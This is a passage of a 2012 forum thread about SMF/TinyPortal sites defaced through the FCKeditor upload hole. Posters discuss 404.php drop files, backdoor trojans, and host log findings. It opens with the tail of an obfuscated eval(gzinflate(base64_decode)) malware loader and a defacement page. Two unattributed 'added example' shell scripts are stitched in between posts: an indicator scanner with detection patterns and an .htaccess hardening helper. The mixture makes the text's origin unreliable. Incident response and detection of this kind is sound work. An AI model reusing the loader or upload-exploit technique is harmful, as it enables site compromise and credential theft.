XKgo+FbgU/GjSI3bhY4nJdEKbNDjwZNOzfHczTdjmpNlA/tW/MRhmlabj4wF2NgntfcYn3Zh8Gg8Gg6C0jxn3lFe/4tVfHyYyC1u0J42p+BSx+NJYrJ7RbRoD/CeAk4DQZft/o1C7vq7Mpsev9NWIKbxnEUf6O+wxl9CXsKtnrmgQ+g//FYoQJFRZ12bFEtfASHjNlgtS7eJQKfZ35XbfsLtkmd6B6j7tC9FPzs0fGFPQn1B0jzmuL9YbfJmSUDRIwCquGgJ7NcNV2zcPydiEjlsTchYPhByUH4WQIQggZPXVrrP3ELw8IET260Bxl1asMZ6tWaord+VJiJHLQuDbj5K+bPC2A/Kq1LonRA1m6EuVZkFtjRMGVb9H3gdmydfiFwVNpvOMDFppEk6yNCtaQdpqdqqKyaFsccfLaKQNhNZbEx/7AcgavCUOFIoekEy9VDitVPHsRN0MJMkuBVlmCJACW5wlezL///P3793//Bw==')));?>
<?php

exit;

?>

21032012.html
<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=windows-1251">

</head>

<body>

21_03_2012 01

</body>

</html>
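The artifacts reported in this thread (the defacement text and the eval(gzinflate(base64_decode(...))) loader in slvreagl's samples above, the 404.php files Lord Anubis found in the root, Themes and Sources folders, and the Packages.php/MessageIndex.php changes badping only noticed when the upgrade failed) can be hunted for in one pass. This is an added example, not SMF or TinyPortal code: one function greps PHP and HTML files for the two content indicators and checks for the 404.php drop files, and a second compares the live web root against a pre-compromise backup so that every modified or added file is listed, not only the three everyone knew to look at. Function names and the constructed sample tree are assumptions; the loader line in the sample is a harmless stand-in, not the blob from the post.

```shell
#!/bin/sh
# Added example, not SMF/TinyPortal code. Assumes POSIX sh with find, grep,
# cmp and sed. Indicators are the ones posted in this thread.

# Content and filename indicators; prints one line per hit, always returns 0.
smf_ioc_scan() {
    root="${1:-.}"
    # PHP or HTML files carrying the defacement text or the obfuscated loader
    find "$root" -type f \( -name '*.php' -o -name '*.html' \) \
        -exec grep -l -e 'eval(gzinflate(base64_decode(' -e 'SouTHRaNDA wAs HeRE' {} + 2>/dev/null \
        | sed "s|^$root/|CONTENT: |"
    # 404.php dropped into the root, Themes and Sources directories
    for sub in . Themes Sources; do
        if [ -f "$root/$sub/404.php" ]; then
            echo "DROP: $sub/404.php"
        fi
    done
    return 0
}

smf_ioc_count() {
    echo $(( $(smf_ioc_scan "$1" | wc -l) ))
}

# Compare the live root with a backup taken before the compromise: report
# files whose bytes differ (index.php, Settings.php, SSI.php, Packages.php,
# ...) and files that exist only in the live tree (drop files, uploads).
smf_diff_backup() {
    root="$1"
    backup="$2"
    (cd "$root" && find . -type f) | sort | while IFS= read -r rel; do
        if [ ! -f "$backup/$rel" ]; then
            echo "ADDED: $rel"
        elif ! cmp -s "$root/$rel" "$backup/$rel"; then
            echo "MODIFIED: $rel"
        fi
    done
    return 0
}

smf_diff_count() {
    echo $(( $(smf_diff_backup "$1" "$2" | wc -l) ))
}

# Constructed sample: a clean backup and a live tree tampered the way the
# thread describes (the loader line is a stand-in, not the real blob).
smf_make_hacked_demo() {
    base="$1"
    mkdir -p "$base/backup/Sources" "$base/forum/Sources" "$base/forum/Themes"
    for d in backup forum; do
        printf '<?php echo "forum"; ?>\n' > "$base/$d/index.php"
        printf '<?php // ssi ?>\n' > "$base/$d/SSI.php"
        printf '<?php // packages ?>\n' > "$base/$d/Sources/Packages.php"
    done
    printf '<html><body>SouTHRaNDA wAs HeRE</body></html>\n' > "$base/forum/index.php"
    printf "<?php /*0000*/ eval(gzinflate(base64_decode('CONSTRUCTED')));?>\n" > "$base/forum/SSI.php"
    printf '<?php // packages, tampered ?>\n' > "$base/forum/Sources/Packages.php"
    printf '<?php // dropped ?>\n' > "$base/forum/Sources/404.php"
    printf '<?php // dropped ?>\n' > "$base/forum/Themes/404.php"
    return 0
}

# Usage: sh smf_ioc.sh /path/to/forum [/path/to/clean/backup]
if [ $# -gt 0 ]; then
    smf_ioc_scan "$1"
    if [ $# -gt 1 ]; then smf_diff_backup "$1" "$2"; fi
fi
```

The backup comparison is the more reliable of the two: the content scan only knows this attacker's strings, whereas a byte-for-byte diff against a clean copy also catches the Sources/ changes that had no obvious marker.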
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: TeaTephi on April 12, 2012, 07:45:54 AM
Quote from: Lord Anubis on April 10, 2012, 04:37:44 PM
Thanks Brad, I think I did remove the FCKeditor when I read about the vulnerability in the past.

Also noticed this hacker added 404.php files in a few folders (so others might want to look for that as well)

- Root
- Themes
- Sources

I already cleared these files from my server, and I didn't save them (so I can't post them up)


I found one of these files in my root folder. Not sure if you guys want me to upload it here? Or just delete it. I haven't checked my SSI file, but I will today.

Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: thefley on April 12, 2012, 03:36:38 PM
So I downloaded tp-images/File to my desktop to take a look at the files, and AVG popped up with 2
"Trojan horse PHP/BackDoor.BH"
"Trojan horse PHP/BackDoor.Cp"

files found...... so this looks like one way they are getting in.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: IchBin™ on April 12, 2012, 05:27:15 PM
For those of you running TinyPortal, make sure you are running the latest version. If you have any previous older install of TP on your forum, make sure you remove the FCKEditor folder.

Has anyone contacted their host to get help with their problem?
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: TeaTephi on April 12, 2012, 05:48:22 PM
Quote from: IchBin™ on April 12, 2012, 05:27:15 PM
For those of you running TinyPortal, make sure you are running the latest version. If you have any previous older install of TP on your forum, make sure you remove the FCKEditor folder.

Has anyone contacted their host to get help with their problem?

I contacted GoDaddy today, purchased their security app, and submitted a ticket with all the problems that I had.

One thing that really annoyed me was that southranda took over my profile on my forum, and I had to come on as another admin and delete myself in order to delete him. I was panicked, probably not the best choice, but I still have my forum intact.

I also submitted a report here with all the info they required (I think). Hopefully we'll get to the bottom of this soon.

BTW, I did delete the FCKeditor and the file in tp-images, and updated TP.

EDIT:
Quote from: GoDaddy support
Dear Sir/Madam,

Thank you for contacting the Website Protection Customer Security Advisors. We understand that your site recently was attacked and defaced by an attacker. From a review of the site logs, it appears that a vulnerable version of FCKeditor was used in order to upload a malicious file to the hosting plan on 4/9/12. Using this malicious file, the attacker was able to upload additional malicious files as well as modify your index page. At this time it does appear that you have already removed the FCKeditor folder as well as the malicious files the attacker was able to upload. A sample of logs has been provided and as can be seen from the logs, the attacker was able to read your configuration file in order to gain your database password. The attacker appears to have made a connection to the database and it's possible that changes could have been made to the database or content copied from the database. You will want to ensure that your users all update their login information to the site as well as ensure that they update their passwords on other sites if they use the same password for multiple websites. As a precaution you may wish to restore your database prior to 4/9/12 if you have a backup of the database that you can verify is clean.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: IchBin™ on April 12, 2012, 08:48:13 PM
If you did indeed have the FCKeditor folder, and were using TP prior to version 1RC1.2, then I'm pretty sure that was your problem. The tp-images/ folder now has a .htaccess file to prevent files from being executed in it, and also TP should not allow anything but images to be uploaded to the directory.

FCKEditor had a file upload exploit that allowed exactly the same problem you have experienced.
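The .htaccess protection IchBin describes for tp-images/ is the general fix for the FCKeditor-style upload problem: even if a script does get written into the upload directory, the web server refuses to run or serve it. TinyPortal's own .htaccess is not shown in this thread, so the following is an added example rather than TP's file. It assumes Apache with .htaccess overrides permitted for the directory (AllowOverride covering FileInfo and the authorization directives); the directives used are standard mod_mime (RemoveHandler/RemoveType) and mod_authz_core / mod_authz_host ones, and the helper that writes and checks the file is hypothetical.

```shell
#!/bin/sh
# Added example, not TinyPortal's .htaccess. Assumes Apache honours .htaccess
# in the upload directory; the regex also catches double extensions such as
# weba.php.pjpg, which a lax handler match might otherwise execute.

# Write a deny-execution .htaccess into an upload directory. Always returns 0.
smf_protect_upload_dir() {
    dir="$1"
    mkdir -p "$dir"
    cat > "$dir/.htaccess" <<'EOF'
# Uploads only: never execute or serve scripts from this directory
RemoveHandler .php .phtml .php3 .php4 .php5
RemoveType .php .phtml .php3 .php4 .php5
<FilesMatch "\.(php|phtml|php[345])(\.|$)">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order deny,allow
        Deny from all
    </IfModule>
</FilesMatch>
EOF
    return 0
}

# Return 0 if the directory's .htaccess denies PHP-like files, 1 otherwise;
# usable as a quick check across every upload directory on a host.
smf_upload_dir_is_protected() {
    f="$1/.htaccess"
    if [ -f "$f" ] && grep -q 'Require all denied' "$f" && grep -q '^RemoveHandler .*\.php' "$f"; then
        return 0
    fi
    return 1
}

# Usage: sh protect_uploads.sh /path/to/forum/tp-images
if [ $# -gt 0 ]; then
    if smf_upload_dir_is_protected "$1"; then
        echo "$1: already protected"
    else
        smf_protect_upload_dir "$1"
        echo "$1: .htaccess written"
    fi
fi
```

The `<IfModule>` pair keeps the file valid on both Apache 2.2 (`Deny from all`) and 2.4 (`Require all denied`); if the host serves a 500 after adding it, the directory's AllowOverride is too restrictive and the same rules have to go into the server configuration instead. Pair this with the permission checks from earlier in the thread, since the .htaccess stops execution but not the upload itself.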
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: TeaTephi on April 12, 2012, 09:20:22 PM
Quote from: IchBin™ on April 12, 2012, 08:48:13 PM
If you did indeed have the FCKeditor folder, and were using TP prior to version 1RC1.2, then I'm pretty sure that was your problem. The tp-images/ folder now has a .htaccess file to prevent files from being executed in it, and also TP should not allow anything but images to be uploaded to the directory.

FCKEditor had a file upload exploit that allowed exactly the same problem you have experienced.

Yep, I had that folder, and the TP version was 1.104. I've got it all correct now. I wish I had deleted it earlier!

Oh it was weird that the hacker himself deleted the FCKeditor from my site.  I thought that was weird, like he closed the door behind him, so no one else could break in?
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: IchBin™ on April 12, 2012, 09:45:38 PM
haha, maybe so. But yeah, that is definitely weird.
Title: Re: Help with hack SouTHRaNDA wAs HeRE
Post by: MrPhil on April 13, 2012, 08:57:29 AM
Quote from: TeaTephi on April 12, 2012, 09:20:22 PM
Oh it was weird that the hacker himself deleted the FCKeditor from my site.  I thought that was weird, like he closed the door behind him, so no one else could break in?

It's not the first time that's been done. I seem to recall hearing of viruses that disable competing viruses.